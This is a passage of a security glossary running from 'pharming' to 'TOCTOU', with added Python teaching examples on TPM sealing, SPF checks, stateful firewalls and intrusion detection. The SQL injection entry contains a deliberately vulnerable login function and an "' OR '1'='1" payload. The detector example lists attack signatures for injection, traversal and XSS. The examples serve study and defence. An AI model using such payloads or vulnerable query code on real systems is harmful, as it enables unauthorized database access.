pharming An attack similar to phishing but that actually pollutes the contents of a computer’s DNS cache so that requests to a legitimate site are actually routed to an alternate site.

phishing A social engineering attack in which a recipient is convinced to click on a link in an email that appears to go to a trusted site but in fact goes to the hacker’s site. It is used to harvest usernames and passwords or credit card and financial data.

phone cloning A process in which copies of a SIM chip are made, allowing another user to make calls as the original user.

physical control A security control that protects an organization’s facilities and personnel.

physical deployment diagram A diagram that shows the details of physical communication links, such as cable length, grade, and wiring paths; servers, with computer name, IP address (if static), server role, and domain membership; device location, such as printer, hub, switch, modem, router and bridge, and proxy location; communication links and the available bandwidth between sites; and the number of users at each site, including mobile users.

physical security manager A person who ensures that the physical security of all buildings and secure locations is maintained and monitored to prevent intrusions by unauthorized individuals.

physical surveillance Capturing and reporting a person’s actions using cameras, direct observance, or CCTV.

PII See personally identifiable information.

plaintext A message in its original format. Also referred to as cleartext.

Platform as a Service (PaaS) A cloud computing model that involves the vendor providing the hardware platform or data center and the software running on the platform. This includes the operating systems and infrastructure software. The company is still involved in managing the system.

platform configuration register (PCR) hash A value held in one of the TPM’s platform configuration registers. A PCR cannot be written directly; it can only be extended, meaning its new value is the hash of its old value concatenated with a new measurement. The resulting PCR values record the platform’s boot state and are used by the sealing function to bind a secret to an expected configuration and by attestation to prove that configuration to a remote party.
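The extend operation, the measured-boot log, and sealing described in the Measured Boot, Integrity Measurement Architecture, and PCR entries above fit together in one short simulation. The following is an added example, not part of the glossary and not the code of any real TPM or operating system: the boot components are constructed byte strings, a SHA-256 bank is assumed, and a dictionary stands in for the TPM. It shows that the log replays to the PCR value, that a tampered bootloader changes the value, and that a secret sealed to the good value is not released after the tampered boot.

```python
"""Added illustration (not from the glossary): how a TPM platform
configuration register accumulates boot measurements by extend, how a
measured-boot log is replayed to verify the PCR, and how sealing ties a
secret to an expected PCR. Boot components and the TPM are constructed
stand-ins; no real TPM is used."""
import hashlib

PCR_SIZE = 32  # SHA-256 bank


def extend(pcr: bytes, measurement: bytes) -> bytes:
    """PCR_new = H(PCR_old || measurement). A register can only be extended,
    never set, so an earlier bad measurement cannot be overwritten."""
    return hashlib.sha256(pcr + measurement).digest()


def measure(component: bytes) -> bytes:
    """Each boot stage hashes the next stage before transferring control."""
    return hashlib.sha256(component).digest()


def measured_boot(components):
    """Return (final_pcr, event_log); the log holds (name, digest_hex) per stage."""
    pcr = bytes(PCR_SIZE)  # PCRs reset to all zeros at power-on
    log = []
    for name, image in components:
        digest = measure(image)
        log.append((name, digest.hex()))
        pcr = extend(pcr, digest)
    return pcr, log


def replay_log(log) -> bytes:
    """A verifier (antimalware or attestation server) recomputes the PCR from
    the log; a mismatch with the TPM-quoted PCR means the log was altered."""
    pcr = bytes(PCR_SIZE)
    for _, digest_hex in log:
        pcr = extend(pcr, bytes.fromhex(digest_hex))
    return pcr


def unseal(sealed_to_pcr: bytes, current_pcr: bytes, secret: bytes):
    """Sealing binds a secret to a PCR value; it is released only when the
    platform is in that measured state. Returns None when the policy fails."""
    return secret if current_pcr == sealed_to_pcr else None


# Constructed boot chain: (component name, component image bytes).
GOOD_CHAIN = [
    (b"firmware", b"uefi-firmware-v1"),
    (b"bootloader", b"bootmgr-v1"),
    (b"kernel", b"os-kernel-v1"),
    (b"elam_driver", b"antimalware-early-launch-v1"),
]


def scenario():
    """Good boot versus a boot with an altered bootloader image."""
    good_pcr, good_log = measured_boot(GOOD_CHAIN)
    tampered = [(n, b"evil-" + img if n == b"bootloader" else img)
                for n, img in GOOD_CHAIN]
    bad_pcr, _ = measured_boot(tampered)
    volume_key = b"constructed-volume-key-sealed-to-good-pcr"
    return {
        "log_replay_matches": replay_log(good_log) == good_pcr,
        "tampered_pcr_differs": bad_pcr != good_pcr,
        "good_boot_unseals": unseal(good_pcr, good_pcr, volume_key) == volume_key,
        "tampered_boot_unseals": unseal(good_pcr, bad_pcr, volume_key) is not None,
    }


if __name__ == "__main__":
    for check, result in scenario().items():
        print(f"{check}: {result}")
```

Because extend is order sensitive, loading the same components in a different sequence also yields a different PCR, which is what lets a verifier distinguish a legitimate update (new expected value) from an unexpected change in the boot path.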

point–in-time (or snapshot) replication Periodic replication that uses the least bandwidth because it replicates only changes.

Point to Point Protocol (PPP) A layer 2 protocol used to transport multiprotocol datagrams over point-to-point links that provides authentication and multilink capability.

Point-to-Point Tunneling Protocol (PPTP) A Microsoft tunneling protocol based on PPP. It uses built-in Microsoft Point-to-Point Encryption (MPPE) and can use a number of authentication methods, including CHAP, MS-CHAP, and EAP-TLS. MPPE and MS-CHAP have known weaknesses, and PPTP is no longer considered secure.

policy A broad rule that provides the foundation for development of standards, baselines, guidelines, and procedures. A policy is an information security governance component that outlines goals but does not give any specific ways to accomplish the stated goals.

Policy Decision Point (PDP) An XACML entity that retrieves all applicable XACML policies and evaluates the access request against them.

Policy Enforcement Point (PEP) An XACML entity that protects a resource that a subject (a user or an application) is attempting to access.

port scanner Software that sends a connection attempt (for example a TCP SYN or a UDP datagram) to every address and port number combination in its target range and keeps track of which ports are open on each device, because ports with listening services answer differently from closed ports.

presence A function provided by many collaboration solutions that indicates the availability of a user. It signals to other users whether a user is online, busy, in a meeting, and so forth.

precise methods DLP methods that involve content registration and trigger almost no false-positive incidents.

preventive control A security control that prevents an attack from occurring.

principle of least privilege See least privilege.

Private Branch Exchange (PBX) A private telephone switching system used within a company. Traditional PBXs are analog or digital; an IP PBX carries calls over the data network.

private cloud A cloud computing model in which a private organization implements a cloud on its internal enterprise to be used by its employees and partners.

privilege escalation The process of exploiting a bug, design flaw, or misconfiguration in an operating system or application to allow a user to receive privileges to which he is not entitled.

procedure An information security governance component that includes all the detailed actions that personnel are required to follow.

programmer A person responsible for developing software that an organization uses and who must understand secure software development.

protocol analyzer Software that collects raw packets from a network and is used by both legitimate security professionals and attackers.

prototyping Using a sample of code to explore a specific approach to solving a problem before investing extensive time and cost in the approach.

proxy firewall A firewall that stands between a connection from the outside and the inside and makes the connection on behalf of the endpoints. With a proxy firewall, there is no direct connection.

public cloud The standard cloud computing model in which a service provider makes resources available to the public over the Internet.

public key infrastructure (PKI) A security framework that includes systems, software, and communication protocols that distribute, manage, and control public key cryptography.

private key encryption See symmetric encryption.

public key encryption See asymmetric encryption.

qualitative risk analysis A method of analyzing risk whereby intuition, experience, and best practice techniques are used to determine risk.

quantitative risk analysis A method of analyzing risk whereby estimated values and formulas are used to determine risk.

RA See registration authority.

race condition A flaw in which the outcome of an operation depends on the timing or order in which concurrent instructions execute. An attacker exploits it by inserting his own actions between two steps the program assumes are atomic, for example between a check and the use of the checked resource (a time-of-check/time-of-use, or TOCTOU, attack), thereby altering the outcome.

radio frequency identification (RFID) A technology that uses radio frequency chips and readers to manage inventory. The chips are placed on individual pieces or pallets of inventory. RFID readers are placed throughout the location to communicate with the chips.

RAID See redundant array of independent disks.

rapid application development (RAD) A development model in which less time is spent upfront on design, while emphasis is placed on rapidly producing prototypes with the assumption that crucial knowledge can only be gained through trial and error.

RC4 A stream cipher that uses a variable key size of 40 to 2,048 bits. Rather than rounds, it runs a key-scheduling algorithm over a 256-byte state and then generates a keystream from that state. Statistical biases in the keystream make RC4 insecure, and its use in TLS is prohibited by RFC 7465.

RC5 A block cipher that uses a variable key size of up to 2,040 bits and a variable number of rounds, from 0 to 255. Block sizes supported are 32, 64, and 128 bits.

RC6 A block cipher derived from RC5 and submitted as an AES finalist. Like RC5 it is parameterized by block size, key size, and round count, but the AES submission uses a 128-bit block, keys of 128, 192, or 256 bits, and 20 rounds.

Real-time Transport Protocol (RTP) A protocol used in the delivery of voice and video traffic over IP. Its Secure RTP (SRTP) profile adds encryption and authentication of the media stream.

reconnaissance The process of gathering information that may be used in an attack.

record-level encryption Encryption that is performed at the record level. Choices can be made about which records to encrypt, which has a significant positive effect on both performance and security.

recoverability The probability that a failed security solution or device can be restored to its normal operable state within a given timeframe, using the prescribed practices and procedures.

recovery control A security control that recovers a system or device after an attack has occurred.

recovery point objective (RPO) The point in time to which a disrupted resource or function must be restored. It defines the maximum amount of data loss, measured in time, that the organization can accept.

recovery time objective (RTO) The maximum time period after a disaster or disruptive event within which a resource or function must be restored to avoid unacceptable consequences.

redundant array of independent disks (RAID) A hard drive technology in which data is written across multiple disks in such a way that a disk can fail and the data can be quickly made available from the remaining disks in the array without resorting to a backup tape. Not every level provides redundancy: RAID 0 stripes data with no parity or mirroring, so one failed disk loses the data. RAID is also not a substitute for backups, because it offers no protection against deletion, corruption, or ransomware, all of which are replicated across the array.

registration authority (RA) The entity in a PKI that verifies the requestor’s identity and registers the requestor.

regulatory security policy A security policy that addresses specific industry regulations, including mandatory standards.

remanence Any data left after media has been erased.

remote access Applications that allow users to access an organization’s resources from a remote connection.

Remote Authentication Dial-In User Service (RADIUS) An authentication, authorization, and accounting (AAA) protocol that centralizes authentication for network access devices such as VPN concentrators, wireless controllers, and switches performing 802.1X.

remote assistance A feature that often relies on the same technology as desktop sharing that allows a technician to share a user’s desktop for the purpose of either teaching the user something or troubleshooting an issue for the user.

Remote Desktop Protocol (RDP) A proprietary protocol developed by Microsoft that provides a graphical interface to connect to another computer over a network connection.

Representational State Transfer (REST) A pattern for interacting with content on remote systems, typically using HTTP.

request for comment (RFC) A formal document that describes research or innovations on the Internet or its systems created by the Internet Engineering Task Force (IETF).

request for information (RFI) A bidding-process document that collects written information about the capabilities of various suppliers. An RFI may be used prior to an RFP or RFQ, if needed, but can also be used after these if the RFP or RFQ does not obtain enough specification information.

request for proposal (RFP) A bidding-process document that is issued by an organization that gives details of a commodity, a service, or an asset that the organization wants to purchase.

request for quotation (RFQ) A bidding-process document that invites suppliers to bid on specific products or services. RFQ generally means the same thing as Invitation for Bid (IFB). RFQs often include item or service specifications.

residual risk Risk that is left over after safeguards have been implemented.

resource exhaustion A state that occurs when a computer is out of memory or CPU cycles.

retina scan A scan of the retina’s blood vessel pattern.

return on investment (ROI) The money gained or lost after an organization makes an investment.

RFC See request for comment.

RFI See request for information.

RFID See radio frequency identification.

RFP See request for proposal.

RFQ See request for quotation.

Rijndael algorithm The block cipher selected as the Advanced Encryption Standard (AES). Rijndael itself supports block sizes and key sizes of 128, 192, or 256 bits independently of each other, with the number of rounds set by the larger of the two: 10 rounds for 128 bits, 12 for 192 bits, and 14 for 256 bits. The AES standard fixes the block size at 128 bits, so AES-128, AES-192, and AES-256 undergo 10, 12, and 14 transformation rounds, respectively.

RIPEMD-160 A message digest algorithm that produces a 160-bit hash value by processing 512-bit blocks through two parallel lines of 80 steps each (five rounds of 16 steps) and combining the results.

risk The probability that a threat agent will exploit a vulnerability, combined with the impact that would result if it did.

risk acceptance A method of handling risk that involves understanding and accepting the level of risk as well as the cost of damages that can occur.

risk avoidance A method of handling risk that involves terminating the activity that causes a risk or choosing an alternative that is not as risky.

risk assessment A tool used in risk management to identify vulnerabilities and threats, assess the impact of those vulnerabilities and threats, and determine which controls to implement.

risk management The process that occurs when organizations identify, measure, and control organizational risks.

risk mitigation A method of handling risk that involves defining the acceptable risk level the organization can tolerate and reducing the risk to that level.

risk transference A method of handling risk that involves passing the risk on to a third party.

ROI See return on investment.

RPO See recovery point objective.

RTO See recovery time objective.

runtime debugging The process of examining a program while it executes, using a debugger or instrumentation, to discover defects that are not visible in the source text alone, such as memory leaks, buffer overflows, and unexpected control flow.

SABSA See Sherwood Applied Business Security Architecture.

SAN See storage-area network.

sandboxing Isolating code in a restricted environment, such as a separate process, container, or virtual machine with limited privileges and system access, so that its behavior, malicious or not, cannot affect the rest of the system.

scalability A characteristic of a device or security solution that describes its capability to cope and perform under an increased or expanding workload.

screened host A firewall architecture in which a packet-filtering router in front of the network screens traffic and a single bastion host behind it handles the permitted connections to the internal network.

screened subnet A subnet in which two firewalls are used, and traffic must be inspected at both firewalls to enter the internal network.

scrubbing The act of deleting incriminating data from an audit log.

SDLC See systems development life cycle.

secret key encryption See symmetric encryption.

secure boot A UEFI feature under which the firmware verifies the digital signature of each boot component (boot loader, option ROMs, drivers, and so on) against keys stored in the firmware's signature databases before executing it, so that the PC boots only software trusted by the platform owner or manufacturer.

Secure Electronic Transaction (SET) A protocol, developed by Visa and MasterCard, that secured credit card transaction information over the Internet. It was never widely deployed and is now obsolete.

Secure Real-time Transport Protocol (SRTP) A protocol that provides encryption, integrity, and anti-replay to Real Time Protocol (RTP) traffic.

Secure Shell (SSH) An application and protocol that is used to remotely log in to another computer using a secure tunnel. It is a secure replacement for Telnet.

Secure Sockets Layer (SSL) A protocol developed by Netscape to encrypt traffic between a client and a server over the Internet. The key length depends on the negotiated cipher suite, not on the protocol version. SSL 2.0 and SSL 3.0 are both deprecated (RFC 6176 and RFC 7568) because of protocol weaknesses such as POODLE, and they have been superseded by TLS.

Security Assertion Markup Language (SAML) An XML-based open standard data format for exchanging authentication and authorization data between parties, particularly between an identity provider and a service provider.

security association (SA) A security relationship established between two endpoints in an IPsec protected connection.

security information and event management (SIEM) Utilities that receive information from log files of critical systems and centralize the collection and analysis of this data.

security parameter index (SPI) A value contained in each IPsec header that helps devices maintain the relationship between each established SA (of which there could be several happening at once) and the security parameters (also called the transform set) used for each SA.

security requirements traceability matrix (SRTM) A spreadsheet-like report that documents the security requirements that a new asset must meet.

security systems development life cycle (SSDLC) A process similar to the SDLC that provides clear and logical steps to follow to ensure that a system includes the appropriate security controls.

sender policy framework (SPF) An email validation system in which a domain publishes, in a DNS TXT record, the hosts authorized to send mail on its behalf. The receiving mail server looks up that record and checks whether the connecting sender's IP address is authorized. SPF yields a result (pass, fail, softfail, neutral, and so on); whether a failing message is rejected, quarantined, or merely marked is decided by the receiver's policy, commonly through DMARC. SPF checks the envelope sender (MAIL FROM), not the visible From header, which is why it is usually paired with DKIM and DMARC.
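An added example, not from the original glossary, of how a receiving server evaluates an SPF record, written in Python. The DNS data is a constructed stand-in dictionary (an assumption for the example), and the evaluator handles only the common mechanisms (ip4, ip6, a, mx, include, all) with their qualifiers; a production check would follow RFC 7208 in full, including the macro syntax and a shared count for the 10-lookup limit, which is only approximated here.

```python
import ipaddress

# Constructed stand-in for DNS (assumption for this example; a real evaluator
# issues TXT, A and MX queries). Addresses are from the documentation ranges.
FAKE_DNS = {
    "TXT": {
        "example.com": "v=spf1 ip4:192.0.2.0/24 a mx include:_spf.mailhost.example -all",
        "_spf.mailhost.example": "v=spf1 ip4:198.51.100.10 ~all",
    },
    "A": {"example.com": ["203.0.113.5"], "mx1.example.com": ["203.0.113.25"]},
    "MX": {"example.com": ["mx1.example.com"]},
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_spf(domain, sender_ip, dns=FAKE_DNS, lookups=0):
    """Evaluate the SPF record of `domain` for a connection from `sender_ip`.

    Returns one of: none, pass, fail, softfail, neutral, permerror.
    """
    if lookups > 10:                     # RFC 7208 caps DNS-querying mechanisms at 10
        return "permerror"               # (counter is per branch here: a simplification)
    record = dns["TXT"].get(domain)
    if record is None or not record.startswith("v=spf1"):
        return "none"
    ip = ipaddress.ip_address(sender_ip)

    for term in record.split()[1:]:      # mechanisms are tested left to right
        qualifier = "+"                  # default qualifier is "+" (pass)
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        matched = False
        if name == "all":
            matched = True
        elif name in ("ip4", "ip6"):
            # `in` is False across address families, so an ip6 term never matches an IPv4 sender
            matched = ip in ipaddress.ip_network(arg, strict=False)
        elif name == "a":
            lookups += 1
            matched = str(ip) in dns["A"].get(arg or domain, [])
        elif name == "mx":
            lookups += 1
            matched = any(str(ip) in dns["A"].get(host, [])
                          for host in dns["MX"].get(arg or domain, []))
        elif name == "include":
            lookups += 1
            # include matches only when the included record yields "pass";
            # the included domain's own "all" term does not end the evaluation
            matched = check_spf(arg, sender_ip, dns, lookups) == "pass"
        if matched:
            return QUALIFIERS[qualifier]
    return "neutral"                     # ran off the end with no "all" term
```

The result is advisory: the receiver decides what to do with `fail` or `softfail`, and in practice the DMARC policy of the From-header domain governs whether the message is rejected, quarantined, or delivered.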

sensor A device used in a SCADA system, which typically has digital or analog I/O, and these signals are not in a form that can be easily communicated over long distances.

separation of duties The concept that sensitive operations should be divided among multiple users so that no one user has the rights and access to carry out a sensitive operation alone. This security measure ensures that one person is not capable of compromising organizational security. It prevents fraud by distributing tasks and their associated rights and privileges between more than one user.

Serial Line Internet Protocol (SLIP) An older layer 2 protocol used to transport multiprotocol datagrams over point-to-point links. It has been made obsolete by PPP.

server-based application virtualization Virtualization in which applications run on servers.

service-level agreements (SLAs) Agreements about the ability of a support system to respond to problems within a certain time frame while providing an agreed level of service.

Service Provisioning Markup Language (SPML) An XML-based open standard for exchanging user, resource, and service provisioning information (for example, requests to create, modify, or delete accounts) between cooperating organizations and systems. Authorization decisions are the domain of XACML instead.

service set identifier (SSID) A name or value assigned to identify a WLAN from other WLANs.

Session Initiation Protocol for Instant Messaging and Presence Leveraging Extensions (SIMPLE) An extension of the Session Initiation Protocol (SIP) used to provide instant messaging and presence information. It offers no protection of its own and relies on the transport (for example, TLS) for confidentiality and integrity.

Session Initiation Protocol (SIP) server A server that is responsible for creating voice and video sessions in a VoIP network.

SET See Secure Electronic Transaction.

Sherwood Applied Business Security Architecture (SABSA) An enterprise security architecture framework that is similar to the Zachman framework. It uses the six communication questions (what, where, when, why, who, and how) that intersect with six layers (operational, component, physical, logical, conceptual, and contextual). It is a risk-driven architecture, a model for guiding the creation and design of a security architecture. It attempts to enhance the communication process between stakeholders.

S-HTTP A protocol that encrypts only the served page data and submitted data like POST fields, leaving the initiation of the protocol unchanged.

Shibboleth An SSO system that allows the use of common credentials among sites that are a part of the federation. It is based on Security Assertion Markup Language (SAML).

shoulder surfing An attack in which a person watches while a user enters login or other confidential data.

signature-based detection A type of intrusion detection that compares traffic against preconfigured attack patterns known as signatures. It is precise for known attacks but cannot detect an attack for which no signature exists, such as a zero-day.

signature dynamics A biometric authentication method that measures stroke speed, pen pressure, and acceleration and deceleration while the user writes his or her signature.

Simple Object Access Protocol (SOAP) A protocol specification for exchanging structured information in the implementation of web services in computer networks.

single loss expectancy The monetary impact of a threat occurrence. The equation is SLE = AV × EF.

single sign-on (SSO) A system in which a user enters login credentials once and can access all resources in the network.

single-tenancy cloud model A cloud computing model where a single tenant uses a resource.

situational awareness Being aware of the environment in which a system operates at a certain point in time.

Six Sigma A process improvement methodology that includes two project methodologies (DMAIC for improving existing processes and DMADV for designing new ones), both inspired by Deming's plan/do/check/act cycle.

Skipjack A block-cipher, symmetric algorithm developed by the U.S. NSA that uses an 80-bit key to encrypt 64-bit blocks. It is used in the Clipper chip.

slack space analysis Analysis of slack space, the unused portion between the end of a file's data and the end of the last cluster allocated to it. Because that portion is not overwritten when the file is written, it can contain fragments of previously deleted files, which forensic tools can recover.

SLE See single loss expectancy.

SOA See statement of applicability.

SRTM See security requirements traceability matrix.

SSDLC See security systems development life cycle.

SSH See Secure Shell.

SSL See Secure Sockets Layer.

snapshot A copy of data at a point in time.

SOCKS firewall A circuit-level firewall that requires a SOCKS client on the computers.

Software as a Service (SaaS) A cloud computing model that involves the vendor providing the entire solution, including the operating system, infrastructure software, and application. An SaaS provider might, for example, provide you with an email system and host and manage everything for you.

software patches Updates released by vendors that either fix functional issues with or close security loopholes in operating systems, applications, and versions of firmware that run on network devices.

spam Unrequested email sent out on a mass basis.

spear phishing The process of foisting a phishing attack on a specific person rather than a random set of people.

spiral model A meta-model that incorporates a number of software development models. The spiral model is an iterative approach that places emphasis on risk analysis at each stage.

SPIT (spam over Internet telephony) An attack that causes unsolicited prerecorded phone messages to be sent.

SQL injection attack An attack that inserts, or "injects," SQL syntax through the input data sent from a client to an application so that the input changes the structure of the query rather than being treated as a value. Results can be reading sensitive data from the database, modifying database data, executing administrative operations on the database, recovering the content of a given file, and in some cases issuing commands to the operating system. The primary defense is parameterized queries (prepared statements), which bind input as data rather than concatenating it into the query text.
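An added example, not from the original text, showing the attack and the fix side by side in Python against an in-memory SQLite table of constructed users. `login_vulnerable` builds the query by string concatenation, so a crafted password alters the query's logic; `login_parameterized` binds the same input as a parameter, so it can only ever be compared as a value.

```python
import sqlite3


def build_db():
    """Constructed in-memory user table for the demo (not real data).
    Passwords are stored in clear only to keep the example short; real
    systems store salted password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "correct-horse", "admin"),
        ("bob", "battery-staple", "user"),
    ])
    return conn


def build_query_unsafe(username, password):
    """Deliberately vulnerable: input becomes part of the SQL text."""
    return ("SELECT username, role FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn, username, password):
    # The password "' OR '1'='1" turns the WHERE clause into
    #   username = 'alice' AND password = '' OR '1'='1'
    # which is true for every row, so every account is returned.
    return conn.execute(build_query_unsafe(username, password)).fetchall()


def login_parameterized(conn, username, password):
    """Hardened: the query text is fixed and the driver binds the values."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


def demo():
    """Run the same injection payload through both implementations."""
    conn = build_db()
    payload = "' OR '1'='1"
    return {
        "query_text": build_query_unsafe("alice", payload),
        "vulnerable": login_vulnerable(conn, "alice", payload),   # returns all rows
        "safe": login_parameterized(conn, "alice", payload),      # returns nothing
        "legit": login_parameterized(conn, "alice", "correct-horse"),
    }
```

The same principle applies to every SQL driver: the query string never contains user input, and the database receives the values separately, so there is no way for a value to be parsed as SQL.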

stakeholder Individuals, teams, and departments, including groups outside the organization, with interests or concerns that should be considered.

standard An information security governance component that describes how policies will be implemented within an organization.

standard library A group of common objects and functions used by a language that developers can access and reuse without re-creating them.

standard word password A password that consists of a single word that often includes a mixture of upper- and lowercase letters.

stateful firewall A firewall that is aware of the proper functioning of the TCP handshake, keeps track of the state of all connections with respect to this process, and can recognize when packets are trying to enter the network that don’t make sense in the context of the TCP handshake.
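An added illustration, not from the original text, of the connection-tracking logic in Python: a minimal tracker that admits only TCP connections initiated from the inside network, walks each connection through the three-way handshake, and drops any packet that has no matching state. The inside prefix, the addresses, and the simplified state machine (no timeouts, a single CLOSING state) are assumptions for the example. The last two packets show the difference from a stateless ACL: an inbound packet with only the ACK flag set would pass a classic "established" rule, but is dropped here because no connection exists.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: str            # TCP flags as letters, e.g. "S", "SA", "A", "FA", "R"


class StatefulFirewall:
    """Tracks TCP connections initiated from the inside; key is the connection 4-tuple."""

    def __init__(self, inside_prefix):
        self.inside_prefix = inside_prefix
        self.table = {}   # (inside_ip, inside_port, outside_ip, outside_port) -> state

    def _lookup(self, p):
        if p.src.startswith(self.inside_prefix):
            return (p.src, p.sport, p.dst, p.dport), "out"
        return (p.dst, p.dport, p.src, p.sport), "in"

    def filter(self, p):
        key, direction = self._lookup(p)
        state = self.table.get(key)
        if state is None:                               # no connection known
            if direction == "out" and p.flags == "S":   # only an inside-initiated SYN opens state
                self.table[key] = "SYN_SENT"
                return "allow"
            return "drop"                               # inbound SYN, bare ACK scan, stray data
        if state == "SYN_SENT":
            if direction == "in" and p.flags == "SA":
                self.table[key] = "SYN_RECV"
                return "allow"
            return "drop"
        if state == "SYN_RECV":
            if direction == "out" and p.flags == "A":
                self.table[key] = "ESTABLISHED"
                return "allow"
            return "drop"
        # ESTABLISHED / CLOSING: both directions pass; teardown updates the state
        if "R" in p.flags:
            del self.table[key]
        elif "F" in p.flags:
            self.table[key] = "CLOSING"                 # a real tracker ages this entry out
        return "allow"


def demo():
    """Constructed packet sequence: a normal handshake, then two unsolicited inbound packets."""
    fw = StatefulFirewall("10.0.0.")
    packets = [
        Packet("10.0.0.5", 40000, "203.0.113.1", 443, "S"),    # inside host opens a connection
        Packet("203.0.113.1", 443, "10.0.0.5", 40000, "SA"),   # server answers
        Packet("10.0.0.5", 40000, "203.0.113.1", 443, "A"),    # handshake completes
        Packet("203.0.113.1", 443, "10.0.0.5", 40000, "A"),    # inbound data on the known connection
        Packet("198.51.100.7", 1234, "10.0.0.5", 22, "A"),     # ACK scan: no state, dropped
        Packet("198.51.100.7", 1234, "10.0.0.5", 22, "S"),     # inbound SYN: dropped
    ]
    return [fw.filter(p) for p in packets]
```

A production tracker also validates sequence and acknowledgement numbers, expires idle entries, and bounds the table size so that a SYN flood cannot exhaust it.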

stateful protocol analysis detection An intrusion detection method that identifies deviations by comparing observed events with predetermined profiles of generally accepted definitions of benign activity.

statement of applicability (SOA) A document that identifies the controls chosen by an organization and explains how and why the controls are appropriate.

static password A password that is the same for each login.

statistical anomaly-based detection An intrusion detection method that establishes a baseline of normal network activity and alerts when traffic deviates from it by more than a configured margin. It can detect attacks that have no signature, at the cost of more false positives, and the baseline must be rebuilt as normal behavior changes.
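An added example, not from the original glossary, that runs both detection methods, signature-based and statistical anomaly-based, over a constructed web access log in Python. The log events, the signature list, and the threshold of three standard deviations above the baseline mean are assumptions for the example. It also shows why the two methods are complementary: the single injection request matches a signature but is invisible to a rate-based anomaly detector, while the request flood has no signature but stands out statistically.

```python
import re
import statistics
from collections import Counter

# Constructed access-log events as (client_ip, request_path) pairs.
BASELINE = [("10.0.0.%d" % (i % 5), "/index.html") for i in range(50)]   # 5 clients, 10 requests each
OBSERVED = (BASELINE[:40]
            + [("10.0.0.9", "/item?id=1 UNION SELECT password FROM users")]
            + [("10.0.0.7", "/search?q=x")] * 60)

SIGNATURES = {                                   # preconfigured attack patterns
    "sql-injection":  re.compile(r"union\s+select", re.I),
    "path-traversal": re.compile(r"\.\./"),
    "xss":            re.compile(r"<script", re.I),
}


def signature_alerts(events):
    """Signature-based detection: report every request matching a known pattern."""
    return [(client, name)
            for client, path in events
            for name, pattern in SIGNATURES.items()
            if pattern.search(path)]


def anomaly_alerts(baseline, events, k=3.0):
    """Statistical anomaly detection: learn the normal per-client request count from
    the baseline, then flag clients in `events` exceeding mean + k * stdev."""
    counts = list(Counter(c for c, _ in baseline).values())
    mean, sd = statistics.mean(counts), statistics.pstdev(counts)
    threshold = mean + k * max(sd, 1.0)         # floor so a perfectly flat baseline still has a band
    return sorted(c for c, n in Counter(c for c, _ in events).items() if n > threshold)
```

Running `signature_alerts(OBSERVED)` reports only the injection attempt, and `anomaly_alerts(BASELINE, OBSERVED)` reports only the flooding client; a SIEM typically combines both kinds of signal for that reason.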

steganography The process of hiding a message inside another object, such as a picture or document.

steganography analysis (steganalysis) Analysis of the files on a drive to detect whether they carry hidden data, typically by looking for statistical artifacts left by the embedding process or by comparing the files against known original copies, and, where possible, to extract that data.

storage area network (SAN) A network of high-capacity storage devices that are connected by a high-speed private network using storage-specific switches.

storage keys TPM versatile memory that contains the keys used to encrypt a computer’s storage, including hard drives, USB flash drives, and so on.

storage root key (SRK) The key held in a TPM's persistent memory at the root of its storage hierarchy. It never leaves the TPM and wraps (encrypts) the other keys the TPM protects.

storage tiering Placing older data on low-cost, low-performance storage while keeping more active data on a faster storage system.

stream-based cipher A cipher that performs encryption on a bit-by-bit basis and uses keystream generators.

substitution The process of exchanging one byte in a message for another.

switch A device that improves performance over a hub because it eliminates collisions.

symmetric encryption An encryption method whereby a single private key both encrypts and decrypts the data. Also referred to as private, or secret, key encryption.

synchronous encryption Encryption or decryption that occurs immediately.

synchronous replication Near-real-time replication in which each write is acknowledged only after it has been committed at the remote site. It uses more bandwidth than asynchronous replication and cannot tolerate latency, which limits the distance between sites.

system-specific security policy A security policy that addresses security for a specific computer, network, technology, or application.

systems development life cycle (SDLC) A process that provides clear and logical steps to follow to ensure that a system that emerges at the end of the development process provides the intended functionality with an acceptable level of security.

supervisory control and data acquisition (SCADA) A system used to remotely control industrial equipment with coded signals. It is a type of industrial control system (ICS).

target test A test in which both the testing team and the organization’s security team are given maximum information about the network and the type of test that will occur.

TCO See total cost of ownership.

TDE See transparent data encryption.

technical control A software or hardware component used to restrict access. See also logical control.

telephony system A system that includes both traditional analog phone systems and digital, or VoIP, systems.

Teredo An IPv4-to-IPv6 transition method that assigns addresses and creates host-to-host tunnels for unicast IPv6 traffic when IPv6 hosts are located behind IPv4 network address translators.

The Open Group Architecture Framework (TOGAF) An architecture framework that helps organizations design, plan, implement, and govern an enterprise’s information architecture.

third-party connection agreement A document that spells out exactly the security measures that should be taken with respect to the handling of data exchanged between the parties. This is a document that should be executed in any instance where a partnership involves depending upon another entity to secure company data.

threat Any potential event or action, deliberate or accidental, that could exploit a vulnerability and cause harm to an asset. A threat is distinct from a vulnerability (the weakness) and from a threat agent (the entity that carries the threat out).

threat actor An entity that discovers and/or exploits vulnerabilities. Not all threat actors will actually exploit an identified vulnerability.

threat agent An entity that carries out a threat.

three-legged firewall A firewall configuration that has three interfaces: one connected to the untrusted network, one to the internal network, and the last to a part of the network called a demilitarized zone (DMZ).

threshold An information security governance component which ensures that security issues do not progress beyond a configured level.

throughput rate The rate at which a biometric system is able to scan characteristics and complete analysis to permit or deny access. The acceptable rate is 6 to 10 subjects per minute. A single user should be able to complete the process in 5 to 10 seconds.

Tiger A hash function that produces 128-, 160-, or 192-bit hash values after performing 24 rounds of computations on 512-bit blocks.

Time Division Multiple Access (TDMA) A channel-access technique that increases capacity over FDMA by dividing each channel into time slots and assigning slots to calls. Time slotting is not a security control; confidentiality on such networks comes from separate encryption of the traffic.

time of check to time of use (TOCTOU) A class of race-condition bug caused by a change in the system between the checking of a condition (such as a file's permissions or ownership) and the use of the result of that check. The fix is generally to make the check and the use a single atomic operation, for example by opening a file first and then inspecting the descriptor actually obtained, rather than checking the path name and then opening it again.
